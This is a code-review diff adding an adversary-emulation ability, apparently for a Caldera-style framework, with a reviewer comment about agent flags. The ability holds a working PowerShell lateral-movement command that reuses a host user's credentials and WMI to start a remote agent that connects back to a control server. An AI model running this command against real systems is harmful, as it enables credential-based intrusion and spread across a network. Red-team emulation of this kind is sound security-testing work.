abilities/lateral-movement/41bb2b7a-75af-49fd-bd15-6c827df25921.yml

```diff
@@ -0,0 +1,23 @@
+---
+
+- id: 41bb2b7a-75af-49fd-bd15-6c827df25921
+  name: Start Agent
+  description: Start Agent
+  tactic: Lateral-Movement
+  technique:
+    attack_id: T1021
+    name: Remote Services
+  executors:
+    windows:
+      command: |
+        $username = "#{host.user.name}";
+        $password = "#{host.user.password}";
+        $secstr = New-Object -TypeName System.Security.SecureString;
+        $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
+        $cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;
+        $session = New-PSSession -ComputerName #{remote.host.name} -Credential $cred;
+        Invoke-WmiMethod -ComputerName #{remote.host.name} -Class Win32_Process -Name Create -ArgumentList "C:\Users\Public\sandcat.exe #{server} #{group}" -Credential $cred
```

Comment:
run Sandcat using the proper flags instead of relying on placement of params... -Server [server] -Group [group]